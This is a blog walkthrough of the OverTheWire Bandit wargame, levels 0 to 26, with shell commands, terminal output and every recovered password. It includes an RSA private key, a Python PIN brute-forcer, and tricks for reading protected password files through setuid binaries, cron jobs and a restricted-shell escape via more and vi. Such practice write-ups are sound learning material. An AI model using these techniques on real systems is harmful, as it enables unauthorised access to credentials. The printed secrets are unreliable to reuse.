OverTheWire Bandit

I’m always looking for a new challenge. OverTheWire Bandit ctf tests Linux and Bash scripting skills to solve security challenges. There are 27 levels.

Level 0 to 1

The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1.

The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH to log into that level and continue the game.

To get the password you simply had to cat the readme file.

bandit0@melinda:~$ ls
readme
bandit0@melinda:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1


Level 1 to 2

The password for the next level is stored in a file called – located in the home directory.
Commands you may need to solve this level: ls, cd, cat, file, du, find

There are different ways of accomplishing the same task in Bash:

bandit1@melinda:~$ cat `find . -name ‘-‘ -print`
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ find . -name ‘-‘ -exec cat {} +
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ find . -name ‘-‘ | xargs cat
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ cat $(find . -name ‘-‘)
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$


Level 2 to 3

The password for the next level is stored in a file called spaces in this filename located in the home directory.
Commands you may need to solve this level: ls, cd, cat, file, du, find

bandit2@melinda:~$ cat spaces\ in\ this\ filename
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK


Level 3 to 4

The password for the next level is stored in a hidden file in the inhere directory.

The ‘-a’ option to the ‘ls’ command shows hidden files. Files are hidden when the name is preceded by a period.

bandit3@melinda:~$ ls -al inhere
total 12
drwxr-xr-x 2 root root 4096 Nov 14 2014 .
drwxr-xr-x 3 root root 4096 Nov 14 2014 ..
-rw-r—– 1 bandit4 bandit3 33 Nov 14 2014 .hidden
bandit3@melinda:~$ cat inhere/.hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB


Level 4 to 5

The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

bandit4@melinda:~/inhere$ file ./* | grep text
./-file07: ASCII text
bandit4@melinda:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh


Level 5 to 6

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties: – human-readable – 1033 bytes in size – not executable.

bandit5@melinda:~$ cd inhere/
bandit5@melinda:~/inhere$ find . -type f -size 1033c ! -executable | xargs file | grep text | cut -d “:” -f 1 | xargs -I % sh -c “echo % ; cat %”
./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7


Level 6 to 7

The password for the next level is stored somewhere on the server and has all of the following properties: – owned by user bandit7 – owned by group bandit6 – 33 bytes in size.

bandit6@melinda:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null | xargs -I % sh -c “echo % ; cat %”
/var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs


Level 7 to 8

The password for the next level is stored in the file data.txt next to the word millionth.

bandit7@melinda:~$ cat data.txt | grep millionth
millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV


Level 8 to 9

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once.

bandit8@melinda:~$ sort data.txt | uniq –count | grep “1 ”
1 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR


Level 9 to 10

The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters.

bandit9@melinda:~$ strings data.txt | grep “^=\+”
========== password
========== ism
========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk


Level 10 to 11

The password for the next level is stored in the file data.txt, which contains base64 encoded data.

bandit10@melinda:~$ cat data.txt | base64 -d
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR


Level 11 to 12

The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions.

bandit11@melinda:~$ cat data.txt | tr ‘A-Za-z’ ‘N-ZA-Mn-za-m’
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
bandit11@melinda:~$
bandit11@melinda:~$ cat data.txt | python -c ‘import sys; print sys.stdin.read().decode(“rot13”)’
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu


Level 12 to 13

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!).

bandit12@melinda:~$ ls
data.txt
bandit12@melinda:~$ mkdir /tmp/123
bandit12@melinda:~$ cp data.txt /tmp/123
bandit12@melinda:~$ cd /tmp/123
bandit12@melinda:/tmp/123$ ls
data.txt
bandit12@melinda:/tmp/123$ xxd -r data.txt > file
bandit12@melinda:/tmp/123$ file file
file: gzip compressed data, was “data2.bin”, from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv file file.gz
bandit12@melinda:/tmp/123$ gzip -d file.gz
bandit12@melinda:/tmp/123$ ls
data.txt file
bandit12@melinda:/tmp/123$ file file
file: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ mv file file.bz2
bandit12@melinda:/tmp/123$ bzip2 -d file.bz2
bandit12@melinda:/tmp/123$ ls
data.txt file
bandit12@melinda:/tmp/123$ file file
file: gzip compressed data, was “data4.bin”, from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv file file.gz
bandit12@melinda:/tmp/123$ ls
data.txt file.gz
bandit12@melinda:/tmp/123$ gzip -d file.gz
bandit12@melinda:/tmp/123$ file file
file: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf file
data5.bin
bandit12@melinda:/tmp/123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/123$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ mv data6.bin data6.bz2
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6.bz2 file
bandit12@melinda:/tmp/123$ bzip2 -d data6.bz2
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 file
bandit12@melinda:/tmp/123$ ls -l
total 48
-rw-r—– 1 bandit12 bandit12 2546 Sep 21 09:40 data.txt
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data5.bin
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data6
-rw-rw-r– 1 bandit12 bandit12 20480 Sep 21 09:43 file
bandit12@melinda:/tmp/123$ file file
file: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf file
data5.bin
bandit12@melinda:/tmp/123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/123$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ bzip -d data6.bin
-bash: bzip: command not found
bandit12@melinda:/tmp/123$ bzip2 -d data6.bin
bzip2: Can’t guess original name for data6.bin — using data6.bin.out
bandit12@melinda:/tmp/123$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data6.bin.out
data8.bin
bandit12@melinda:/tmp/123$ file data8.bin
data8.bin: gzip compressed data, was “data9.bin”, from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv data8.bin data8.gz
bandit12@melinda:/tmp/123$ gzip -d data8.bin
gzip: data8.bin.gz: No such file or directory
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 data6.bin.out data8.gz file
bandit12@melinda:/tmp/123$ gzip -d data8.gz
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 data6.bin.out data8 file
bandit12@melinda:/tmp/123$ ls -l
total 64
-rw-r—– 1 bandit12 bandit12 2546 Sep 21 09:40 data.txt
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data5.bin
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data6
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data6.bin.out
-rw-r–r– 1 bandit12 bandit12 49 Nov 14 2014 data8
-rw-rw-r– 1 bandit12 bandit12 20480 Sep 21 09:43 file
bandit12@melinda:/tmp/123$ file data8
data8: ASCII text
bandit12@melinda:/tmp/123$ cat data8
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL


Level 13 to 14

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on

bandit13@melinda:~$ ls
sshkey.private
bandit13@melinda:~$ ls -l /etc/bandit_pass/bandit14
-r——– 1 bandit14 bandit14 33 Nov 14 2014 /etc/bandit_pass/bandit14
bandit13@melinda:~$
bandit13@melinda:~$ ssh -i ./sshkey.private bandit14@localhost

bandit14@melinda:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e


Level 14 to 15

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

bandit14@melinda:~$ echo 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e | nc localhost 30000
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr


Level 15 to 16

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

bandit15@melinda:~$ openssl s_client -quiet -connect 127.0.0.1:30001
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd


Level 16 to 17

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

bandit16@melinda:~$ openssl s_client -quiet -connect localhost:31790
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
—–BEGIN RSA PRIVATE KEY—–
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
—–END RSA PRIVATE KEY—–


Level 17 to 18

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19

Save the cert above to cert.cer.

steve@steve-nuc:~$ chmod 400 cert.cer
steve@steve-nuc:~$ ssh -i cert.cer bandit17@bandit.labs.overthewire.org

bandit17@melinda:~$ diff passwords.old passwords.new
42c42
< BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR

> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd


Level 18 to 19

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

steve@steve-nuc:~$ scp bandit18@bandit.labs.overthewire.org:readme ~
bandit18@bandit.labs.overthewire.org’s password:
readme 100% 33 0.0KB/s 00:00
steve@steve-nuc:~$ cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x


Level 19 to 20

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.

bandit19@melinda:~$ ls -l
total 8
-rwsr-x— 1 bandit20 bandit19 7370 Nov 14 2014 bandit20-do
bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j


Level 20 to 21

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

In the first ssh session:
bandit20@melinda:~$ nc -lvp 65535 < /etc/bandit_pass/bandit20
Listening on [0.0.0.0] (family 0, port 65535)

In the second ssh session:
bandit20@melinda:~$ ./suconnect 65535

Back in the first ssh session it has sent us the password:
Connection from [127.0.0.1] port 65535 [tcp/*] accepted (family 2, sport 42398)
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr


Level 21 to 22

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

bandit21@melinda:~$ ls /etc/cron.d
behemoth4_cleanup leviathan5_cleanup natas25_cleanup~ semtex0-ppc
cron-apt manpage3_resetpw_job natas26_cleanup semtex5
cronjob_bandit22 melinda-stats natas27_cleanup sysstat
cronjob_bandit23 natas-session-toucher php5 vortex0
cronjob_bandit24 natas-stats semtex0-32 vortex20
cronjob_bandit24_root natas25_cleanup semtex0-64
bandit21@melinda:~$ cat /etc/cron.d/cronjob_bandit22
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@melinda:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@melinda:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI


Level 22 to 23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

andit22@melinda:~$ cat /etc/cron.d/cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@melinda:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ‘ ‘ -f 1)

echo “Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget”

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@melinda:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@melinda:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@melinda:~$ echo I am user bandit23 | md5sum | cut -d ‘ ‘ -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@melinda:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n


Level 23 to 24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo “Executing and deleting all scripts in /var/spool/$myname:”
for i in * .*;
do
if [ “$i” != “.” -a “$i” != “..” ];
then
echo “Handling $i”
timeout -s 9 60 “./$i”
rm -f “./$i”
fi
done

Find a writable location since my previous attempts to output the password to a file in /tmp were deleted:
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Directory /run/lock looks good. Created my script there:
bandit23@melinda:~$ cat /run/lock/bandit24pwd.sh
#!/bin/sh
cat /etc/bandit_pass/bandit24 >> /run/lock/password

bandit23@melinda:~$ chmod +x /run/lock/bandit24pwd.sh
bandit23@melinda:~$ cp /run/lock/bandit24pwd.sh /var/spool/bandit24
bandit23@melinda:~$ ls /var/spool/bandit24
bandit24pwd.sh script.sh
bandit23@melinda:~$ ls /run/lock
bandit24pwd.sh hello password
bandit23@melinda:~$ cat /run/lock/password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ


Level 24 to 25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24@melinda:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1111
Wrong! Please enter the correct pincode. Try again.

This looks like a good application for Python.

pin.py

#!/usr/bin/env python
import socket
password = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ "
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending: password and pin...\n"
sock.connect(('localhost', 30002))
data = sock.recv(1024)
for x in range(0,10000):
    sock.send(password + str(x).zfill(4) + "\n")
    data = sock.recv(1024)
    if not "Wrong!" in data:
    print data

bandit24@melinda:/var/lock$ python pin.py
Sending: password and pin…

Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.


Level 25 to 26

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

I ssh to bandit26:
bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost

I’m immediately logged out. Let’s checkout the shell for bandit26.
bandit25@melinda:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

The shell for bandit26 is /usr/bin/showtext:
bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0

In order to get more to pause and not exit, I reduced my terminal window size to 5 lines.

I ssh in again and more is activated. Reading up on more, I find that when paused you can enter the “v” character to enter vi. Once in the vi shell you can read a file with “:r </path/to/file>”.

_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| ‘_ \ / _` | ‘_ \ / _` | | __| / / ‘_ \
:r /etc/bandit_pass/bandit26

I pressed the spacebar eleven times to page with more and see the password:
_ _ _ _ ___ __
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_


Level 26 to 27

At this moment, level 27 does not exist yet.

 

(Visited 394 times, 1 visits today)

Leave a Reply

Your email address will not be published. Required fields are marked *